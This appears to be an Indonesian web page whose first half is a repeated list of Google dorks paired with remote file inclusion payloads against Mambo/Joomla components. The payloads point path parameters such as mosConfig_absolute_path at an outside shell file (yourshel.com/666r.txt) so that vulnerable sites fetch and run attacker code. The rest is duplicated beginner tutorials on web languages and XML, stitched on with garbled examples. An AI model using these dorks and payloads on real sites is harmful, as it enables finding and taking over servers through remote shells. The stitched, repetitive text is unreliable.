CODE: /components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————– Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt? ———————————————————————————–
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”minibb\”
CODE:
components/minibb/index.php?absolute_path=http://yourshel.com/666r.txt?
———————————————————————
Google dork:
inurl:\”com_smf\”
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_pollxt\”
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_loudmounth\”
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://shellerz.com/r.txt?
————————————————————————
Google dork:
inurl:\”com_videodb\”
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_multibanners\”
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://yourshel.com/666r.txt?
———————————————————————–
Google dork:inurl:\”com_a6mambohelpdesk\”
CODE:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_colophon\”
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mgm\”
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mambatstaff\”
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_securityimages\”
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_artlinks\”
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:inurl:\”com_hashcash\”
CODE:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————————
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_forum\”
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:inurl:\”com_hashcash\”
CODE:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
—————————————————————————–
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_forum\”
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:\”com_colophon\”
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mgm\”
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mambatstaff\”
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_securityimages\”
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_artlinks\”
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:
inurl:\”com_hashcash\”
CODE
:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————————
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_forum\”
CODE: /components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————– Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt? ———————————————————————————–
Google dork:
inurl:index.php?option=com_extcalendar
CODE:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”minibb\”
CODE:
components/minibb/index.php?absolute_path=http://yourshel.com/666r.txt?
———————————————————————
Google dork:
inurl:\”com_smf\”
CODE:
/components/com_smf/smf.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_pollxt\”
CODE:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_loudmounth\”
CODE:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://shellerz.com/r.txt?
————————————————————————
Google dork:
inurl:\”com_videodb\”
CODE:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:index.php?option=com_pcchess
CODE:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_multibanners\”
CODE:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://yourshel.com/666r.txt?
———————————————————————–
Google dork:inurl:\”com_a6mambohelpdesk\”
CODE:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_colophon\”
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mgm\”
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mambatstaff\”
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_securityimages\”
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_artlinks\”
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:inurl:\”com_hashcash\”
CODE:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————————
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_forum\”
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:index.php?option=com_simpleboard
CODE:
/components/com_simpleboard/file_upload.php?sbp=http://yourshel.com/666r.txt?
—————————————————————
Google dork:inurl:\”com_hashcash\”
CODE:/components/com_hashcash/server.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
—————————————————————————–
Google dork:
inurl:\”com_htmlarea3_xtd-c\”
CODE:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_sitemap\”
CODE:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
————————————————————————————
Google dork:
inurl:\”com_forum\”
CODE:
/components/com_forum/download.php?phpbb_root_path=http://yourshel.com/666r.txt?
——————————————————————–
Google dork:
inurl:\”com_pccookbook\”
CODE:
components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————————–
Google dork:
inurl:\”com_colophon\”
CODE:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mgm\”
CODE:
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_mambatstaff\”
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_securityimages\”
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_artlinks\”
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
———————————————————————–
Google dork:
inurl:\”com_galleria\”
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourshel.com/666r.txt?
Belajar Bahasa Pemrograman Web
Jika anda suka sekali dalam pembuatan web, maka anda tidak akan terlepas dari apa yang namanya bahasa pemrograman. Bahasa pemrograman merupakan suatu teknik komando/instruksi standar untuk memerintah komputer.
Berikut adalah penjelasan tentang bahasa pemrograman apa saja yang biasa digunakan untuk membuat suatu website :
1. Bahasa Pemrograman HTML
HyperText Markup Language (HTML) adalah sebuah bahasa markup yang digunakan untuk membuat sebuah halaman web dan menampilkan berbagai informasi di dalam sebuah browser Internet.
HTML saat ini merupakan standar Internet yang didefinisikan dan dikendalikan penggunaannya oleh World Wide Web Consortium (W3C).
HTML berupa kode-kode tag yang menginstruksikan browser untuk menghasilkan tampilan sesuai dengan yang diinginkan.
Sebuah file yang merupakan file HTML dapat dibuka dengan menggunakan browser web seperti Mozilla Firefox atau Microsoft Internet Explorer.
2. Bahasa Pemrograman PHP
PHP adalah bahasa pemrograman script yang paling banyak dipakai saat ini.
PHP pertama kali dibuat oleh Rasmus Lerdorf pada tahun 1995. Pada waktu itu PHP masih bernama FI (Form Interpreted), yang wujudnya berupa sekumpulan script yang digunakan untuk mengolah data form dari web.
PHP banyak dipakai untuk membuat situs web yang dinamis, walaupun tidak tertutup kemungkinan digunakan untuk pemakaian lain.
PHP biasanya berjalan pada sistem operasi linux (PHP juga bisa dijalankan dengan hosting windows).
3. Bahasa Pemrograman ASP
ASP adalah singkatan dari Active Server Pages yang merupakan salah satu bahasa pemograman web untuk menciptakan halaman web yang dinamis.
ASP merupakan salah satu produk teknologi yang disediakan oleh Microsoft.
ASP bekerja pada web server dan merupakan server side scripting.
4. Bahasa Pemrograman XML
Extensible Markup Language (XML) adalah bahasa markup serbaguna yang direkomendasikan W3C untuk mendeskripsikan berbagai macam data.
XML menggunakan markup tags seperti halnya HTML namun penggunaannya tidak terbatas pada tampilan halaman web saja.
XML merupakan suatu metode dalam membuat penanda/markup pada sebuah dokumen.
5. Bahasa Pemrograman WML
WML adalah kepanjangan dari Wireless Markup Language, yaitu bahasa pemrograman yang digunakan dalam aplikasi berbasis XML (eXtensible Markup Langauge).
WML ini adalah bahasa pemrograman yang digunakan dalam aplikasi wireless.
WML merupakan analogi dari HTML yang berjalan pada protocol nirkabel.
6. Bahasa Pemrograman PERL
Perl adalah bahasa pemrograman untuk mesin dengan sistem operasi Unix (SunOS, Linux, BSD, HP-UX), juga tersedia untuk sistem operasi seperti DOS, Windows, PowerPC, BeOS, VMS, EBCDIC, dan PocketPC.
PERL merupakan bahasa pemograman yang mirip bahasa pemograman C.
7. Bahasa Pemrograman CFM
Cfm dibuat menggunakan tag ColdFusion dengan software Adobe ColdFusion / BlueDragon / Coldfusion Studio.
Syntax coldfusion berbasis html.
8. Bahasa Pemrograman Javascript
Javascript adalah bahasa scripting yang handal yang berjalan pada sisi client.
JavaScript merupakan sebuah bahasa scripting yang dikembangkan oleh Netscape.
Untuk menjalankan script yang ditulis dengan JavaScript kita membutuhkan JavaScript-enabled browser yaitu browser yang mampu menjalankan JavaScript.
9. Bahasa Pemrograman CSS
Cascading Style Sheets (CSS) adalah suatu bahasa stylesheet yang digunakan untuk mengatur tampilan suatu dokumen yang ditulis dalam bahasa markup.
Penggunaan yang paling umum dari CSS adalah untuk memformat halaman web yang ditulis dengan HTML dan XHTML.
Walaupun demikian, bahasanya sendiri dapat dipergunakan untuk semua jenis dokumen XML termasuk SVG dan XUL.
Spesifikasi CSS diatur oleh World Wide Web Consortium (W3C)
Berikut adalah penjelasan tentang bahasa pemrograman apa saja yang biasa digunakan untuk membuat suatu website :
1. Bahasa Pemrograman HTML
HyperText Markup Language (HTML) adalah sebuah bahasa markup yang digunakan untuk membuat sebuah halaman web dan menampilkan berbagai informasi di dalam sebuah browser Internet.
HTML saat ini merupakan standar Internet yang didefinisikan dan dikendalikan penggunaannya oleh World Wide Web Consortium (W3C).
HTML berupa kode-kode tag yang menginstruksikan browser untuk menghasilkan tampilan sesuai dengan yang diinginkan.
Sebuah file yang merupakan file HTML dapat dibuka dengan menggunakan browser web seperti Mozilla Firefox atau Microsoft Internet Explorer.
2. Bahasa Pemrograman PHP
PHP adalah bahasa pemrograman script yang paling banyak dipakai saat ini.
PHP pertama kali dibuat oleh Rasmus Lerdorf pada tahun 1995. Pada waktu itu PHP masih bernama FI (Form Interpreted), yang wujudnya berupa sekumpulan script yang digunakan untuk mengolah data form dari web.
PHP banyak dipakai untuk membuat situs web yang dinamis, walaupun tidak tertutup kemungkinan digunakan untuk pemakaian lain.
PHP biasanya berjalan pada sistem operasi linux (PHP juga bisa dijalankan dengan hosting windows).
3. Bahasa Pemrograman ASP
ASP adalah singkatan dari Active Server Pages yang merupakan salah satu bahasa pemograman web untuk menciptakan halaman web yang dinamis.
ASP merupakan salah satu produk teknologi yang disediakan oleh Microsoft.
ASP bekerja pada web server dan merupakan server side scripting.
4. Bahasa Pemrograman XML
Extensible Markup Language (XML) adalah bahasa markup serbaguna yang direkomendasikan W3C untuk mendeskripsikan berbagai macam data.
XML menggunakan markup tags seperti halnya HTML namun penggunaannya tidak terbatas pada tampilan halaman web saja.
XML merupakan suatu metode dalam membuat penanda/markup pada sebuah dokumen.
5. Bahasa Pemrograman WML
WML adalah kepanjangan dari Wireless Markup Language, yaitu bahasa pemrograman yang digunakan dalam aplikasi berbasis XML (eXtensible Markup Langauge).
WML ini adalah bahasa pemrograman yang digunakan dalam aplikasi wireless.
WML merupakan analogi dari HTML yang berjalan pada protocol nirkabel.
6. Bahasa Pemrograman PERL
Perl adalah bahasa pemrograman untuk mesin dengan sistem operasi Unix (SunOS, Linux, BSD, HP-UX), juga tersedia untuk sistem operasi seperti DOS, Windows, PowerPC, BeOS, VMS, EBCDIC, dan PocketPC.
PERL merupakan bahasa pemograman yang mirip bahasa pemograman C.
7. Bahasa Pemrograman CFM
Cfm dibuat menggunakan tag ColdFusion dengan software Adobe ColdFusion / BlueDragon / Coldfusion Studio.
Syntax coldfusion berbasis html.
8. Bahasa Pemrograman Javascript
Javascript adalah bahasa scripting yang handal yang berjalan pada sisi client.
JavaScript merupakan sebuah bahasa scripting yang dikembangkan oleh Netscape.
Untuk menjalankan script yang ditulis dengan JavaScript kita membutuhkan JavaScript-enabled browser yaitu browser yang mampu menjalankan JavaScript.
9. Bahasa Pemrograman CSS
Cascading Style Sheets (CSS) adalah suatu bahasa stylesheet yang digunakan untuk mengatur tampilan suatu dokumen yang ditulis dalam bahasa markup.
Penggunaan yang paling umum dari CSS adalah untuk memformat halaman web yang ditulis dengan HTML dan XHTML.
Walaupun demikian, bahasanya sendiri dapat dipergunakan untuk semua jenis dokumen XML termasuk SVG dan XUL.
Spesifikasi CSS diatur oleh World Wide Web Consortium (W3C)
Dasar-Dasar XML
XML
Tentu kamu sudah sering dengar apa itu XML. XML (Extensible Markup Language) merupakan bahasa markup yang menggunakan tag-tag dalam pelabelan, menggolongkan, dan mengorganisir informasi dengan cara tertentu. XML dapat jadi merupakan sebuah solusi untuk pengiriman data yang sama ke barbagai tujuan yang berbeda, misalnya kedalam handphone dan web browser dalam waktu yang sama.
XML tuh masih saudara dekat sama HTML (Hyper Text Markup Language) yang digunakan untuk menampilkan informasi dihalaman web, keduanya masih satu turunan dari induk markup language yaitu SGML (Standard Generalized Merkup Language). Tidak seperti HTML yang mempunyai pendefinisian tag, XML tidak mempunyai definisi tag. Sebagai gantinya kita dapat mendefinisikan tag-tag kita sendiri dengan menggunakan XML. Tapi meskipun begitu XML mempunyai aturan-aturan untuk sebuah sintaks dokumen XML.
Keunggulan XML
Apa sih keunggulan XML? Keunggulan XML antara lain :
* Mempunyai sedikit aturan sehingga mudah dibuat dan mudah dibaca
* Mudah untuk dikembangkan lagi
* Dapat diterjemahkan diberbagai macam bahassa pemrograman (platform) dan tool
Element
Element merupakan blok bangunan fundamental setiap file XML. Pada elemen terdiri dari tag pembuka, isi dan tag penutup. Contohnya adalah sebagai berikut :
Aji
setyoaji@ymail.com
Pada contoh diatas terdapat satu elemen yaitu mahasiswa. Elemen mahasiswa dimulai dengan tag dan ditutup dengan
Atribut
Atribut merupakan bagian dari file XML yang digunakan untuk memberikan informasi ekstra mengenai sebuah elemen. Sebuah atribut selalu muncul dalam tag pembukaan sebuah element, dengan bentuk dasar Nama=”value”. Jadi sebuah atribut terdiri dari dua bagian yaitu nama dan nilai (value). Pada sebuah elemen dapat memiliki banyak atribut.
Manfaat Menggunakan XML
Banyak sekali manfaat yang didapatkan dari pemakainan XML tetapi yang paling umum adalah :
* XML dapat digunakan untuk menyimpan informasi konfigurasi, seperti setting security untuk aplikasi web, lokasi modul yang diperlukan dan sebagainya.
* XML merupakan format yang sangat baik untuk mengirimkan informasi tanpa memandang platform atau bahasa yang digunakan
* XML merupakan pengganti yang paling tepat untuk database kecil. Dengan XML dapat dibuat sebuah format file sederhana yang dapat dihubungkan dan diedit oleh program atau pemakai.
Aturan Penulisan XML
Aturan dasar penulisan dokumen XML antara lain :
* Dokumen XML terdiri dari tag yang bersifat case sensitif (membedakan huruf besar dan kecil), misal berbeda dengan
* Semua elemen XML harus mempunyai tag penutup, misal surabaya
* Semua elemen XML harus bersarang, misalnya :
123456789
Setyo Aji
* Semua dokumen XML harus mempunyai elemen root dan semua elemen lainnya harus berada didalam elemen root. misalnya :
123456789
Setyo
234567890
Aji
* Elemen XML dapat diperluas agar lebih banyak membawa informasi. Misalnya pada tag mahasiswa, maka dibawah tag dapat ditambahkan lagi tag dan sebagainya.
XML Schema
XML Schema merupakan informasi mengenai metadata yang mendefinisikan cara yang tepat penstrukturan file XML. Untuk membuat struktur tabel dalam XML digunakan XSD (XML Schema Definition). Jika kamu membuat XML Schema yang terpisah dari file XML, file yang terbentuk akan mempunyai akhiran xsd. Berikut ini merupakan sebuah contoh dari XML Schema.
elemenFormDefault="qualified"
xmlns="http://tempuri.org/XMLSchema1.xsd"
xmlns:mstns="http://tempuri.org/XMLSchema1.xsd"
xmlns:xs="http://www.3w.org/2001/XMLSchema">
Membuat Schema Sendiri
XML Schema merupakan sebuah format XML untuk menyimpan struktur sebuah database. Pada XML Schema berisi informasi tentang :
* Tabel (Berisi nama tabel, field, dan tipe data)
* Constrain
* Relationship antar tabel
Langkah2 untuk membuat XML Schema sendiri dengan Visual Studio 2005 adalah sebagai berikut :
1. Klik menu Project kemudian klik menu Add New Item
2. Kemudian pilih templates XML Schema. Secara otomatis .Net akan memberikan nama pada kotak isian Name: (Misal XMLSchema2.xsd)
3. Klik tombol open dan pada toolbox akan diaktifkan tab XML Schema.
4. Lakukan drag kontrol Element kearah schema yang ada disebelah kanan Toolbox
5. Selanjutnya ganti Teks element1 dengan “mahasiswa” dan isikan nama field berserta tipe datanya yaitu nim (string), dan nama (string).
6. Mengingat yang dibuat adalah tabel master, perlu ditambahkan constrain Primary Key agar datanya unik (tidak ada yang dobel)
7. Untuk membuat constrain klik kanan pada elemen sampai dimunculkan menu popup
8. Kemudian pilih menu Add dan pilih menu New Key untuk menampilkan kotak dialog Edit Key.
9. Sebuah dialog Edit Key ditampilkan dan aktifkan kotak cek Dataset Primary Key.
10. Klik tombol OK untuk menutup kotal dialog Eidt Key.
11. Jika ingin menambahkan RelationShips, setelah klik kanan pada elemen pilih Add dan pilih New relation. relationship akan berfungsi jika minimal terdapat 2 elemen dalam schema. Peletakan klik kanan harus pada tabel yang mengacu (tabel master} pada tabel lain. Bukan pada tabel yang diacu (tabel Master) oleh tabel lain.
12. Selanjutnya lakukan generate dengan klik kanan pada XMLSchema. Designer dan pilih menu Generate Dtaset.
13. Langkah berikutnya adalah membuat Typed Dataset yaitu dengan mengaktifkan tab Data pada toolbox, lakukan drag atau klik ganda pada kontrol Dataset
14. Sebuah kotak dialog Add Dataset Ditampilkan. Tuliskan nama objek Dataset yang akan digunakan (Misal contoh_xml.XMLSchema2). Tutup seluruh proses dengan mengklik tombol OK.
15. Aktifkan XMLSchema2.xsd yang baru saja dibuat sehingga kursor berada di XMLSchema Designer. Perhatikan pada properti targetNamespace. Target ini nantinya menjadi penghubung antara XML schema dengan XML File sebagai tempat penyimpanan data.
Tentu kamu sudah sering dengar apa itu XML. XML (Extensible Markup Language) merupakan bahasa markup yang menggunakan tag-tag dalam pelabelan, menggolongkan, dan mengorganisir informasi dengan cara tertentu. XML dapat jadi merupakan sebuah solusi untuk pengiriman data yang sama ke barbagai tujuan yang berbeda, misalnya kedalam handphone dan web browser dalam waktu yang sama.
XML tuh masih saudara dekat sama HTML (Hyper Text Markup Language) yang digunakan untuk menampilkan informasi dihalaman web, keduanya masih satu turunan dari induk markup language yaitu SGML (Standard Generalized Merkup Language). Tidak seperti HTML yang mempunyai pendefinisian tag, XML tidak mempunyai definisi tag. Sebagai gantinya kita dapat mendefinisikan tag-tag kita sendiri dengan menggunakan XML. Tapi meskipun begitu XML mempunyai aturan-aturan untuk sebuah sintaks dokumen XML.
Keunggulan XML
Apa sih keunggulan XML? Keunggulan XML antara lain :
* Mempunyai sedikit aturan sehingga mudah dibuat dan mudah dibaca
* Mudah untuk dikembangkan lagi
* Dapat diterjemahkan diberbagai macam bahassa pemrograman (platform) dan tool
Element
Element merupakan blok bangunan fundamental setiap file XML. Pada elemen terdiri dari tag pembuka, isi dan tag penutup. Contohnya adalah sebagai berikut :
Pada contoh diatas terdapat satu elemen yaitu mahasiswa. Elemen mahasiswa dimulai dengan tag
Atribut
Atribut merupakan bagian dari file XML yang digunakan untuk memberikan informasi ekstra mengenai sebuah elemen. Sebuah atribut selalu muncul dalam tag pembukaan sebuah element, dengan bentuk dasar Nama=”value”. Jadi sebuah atribut terdiri dari dua bagian yaitu nama dan nilai (value). Pada sebuah elemen dapat memiliki banyak atribut.
Manfaat Menggunakan XML
Banyak sekali manfaat yang didapatkan dari pemakainan XML tetapi yang paling umum adalah :
* XML dapat digunakan untuk menyimpan informasi konfigurasi, seperti setting security untuk aplikasi web, lokasi modul yang diperlukan dan sebagainya.
* XML merupakan format yang sangat baik untuk mengirimkan informasi tanpa memandang platform atau bahasa yang digunakan
* XML merupakan pengganti yang paling tepat untuk database kecil. Dengan XML dapat dibuat sebuah format file sederhana yang dapat dihubungkan dan diedit oleh program atau pemakai.
Aturan Penulisan XML
Aturan dasar penulisan dokumen XML antara lain :
* Dokumen XML terdiri dari tag yang bersifat case sensitif (membedakan huruf besar dan kecil), misal
* Semua elemen XML harus mempunyai tag penutup, misal
* Semua elemen XML harus bersarang, misalnya :
* Semua dokumen XML harus mempunyai elemen root dan semua elemen lainnya harus berada didalam elemen root. misalnya :
* Elemen XML dapat diperluas agar lebih banyak membawa informasi. Misalnya pada tag mahasiswa, maka dibawah tag
XML Schema
XML Schema merupakan informasi mengenai metadata yang mendefinisikan cara yang tepat penstrukturan file XML. Untuk membuat struktur tabel dalam XML digunakan XSD (XML Schema Definition). Jika kamu membuat XML Schema yang terpisah dari file XML, file yang terbentuk akan mempunyai akhiran xsd. Berikut ini merupakan sebuah contoh dari XML Schema.
elemenFormDefault="qualified"
xmlns="http://tempuri.org/XMLSchema1.xsd"
xmlns:mstns="http://tempuri.org/XMLSchema1.xsd"
xmlns:xs="http://www.3w.org/2001/XMLSchema">
Membuat Schema Sendiri
XML Schema merupakan sebuah format XML untuk menyimpan struktur sebuah database. Pada XML Schema berisi informasi tentang :
* Tabel (Berisi nama tabel, field, dan tipe data)
* Constrain
* Relationship antar tabel
Langkah2 untuk membuat XML Schema sendiri dengan Visual Studio 2005 adalah sebagai berikut :
1. Klik menu Project kemudian klik menu Add New Item
2. Kemudian pilih templates XML Schema. Secara otomatis .Net akan memberikan nama pada kotak isian Name: (Misal XMLSchema2.xsd)
3. Klik tombol open dan pada toolbox akan diaktifkan tab XML Schema.
4. Lakukan drag kontrol Element kearah schema yang ada disebelah kanan Toolbox
5. Selanjutnya ganti Teks element1 dengan “mahasiswa” dan isikan nama field berserta tipe datanya yaitu nim (string), dan nama (string).
6. Mengingat yang dibuat adalah tabel master, perlu ditambahkan constrain Primary Key agar datanya unik (tidak ada yang dobel)
7. Untuk membuat constrain klik kanan pada elemen sampai dimunculkan menu popup
8. Kemudian pilih menu Add dan pilih menu New Key untuk menampilkan kotak dialog Edit Key.
9. Sebuah dialog Edit Key ditampilkan dan aktifkan kotak cek Dataset Primary Key.
10. Klik tombol OK untuk menutup kotal dialog Eidt Key.
11. Jika ingin menambahkan RelationShips, setelah klik kanan pada elemen pilih Add dan pilih New relation. relationship akan berfungsi jika minimal terdapat 2 elemen dalam schema. Peletakan klik kanan harus pada tabel yang mengacu (tabel master} pada tabel lain. Bukan pada tabel yang diacu (tabel Master) oleh tabel lain.
12. Selanjutnya lakukan generate dengan klik kanan pada XMLSchema. Designer dan pilih menu Generate Dtaset.
13. Langkah berikutnya adalah membuat Typed Dataset yaitu dengan mengaktifkan tab Data pada toolbox, lakukan drag atau klik ganda pada kontrol Dataset
14. Sebuah kotak dialog Add Dataset Ditampilkan. Tuliskan nama objek Dataset yang akan digunakan (Misal contoh_xml.XMLSchema2). Tutup seluruh proses dengan mengklik tombol OK.
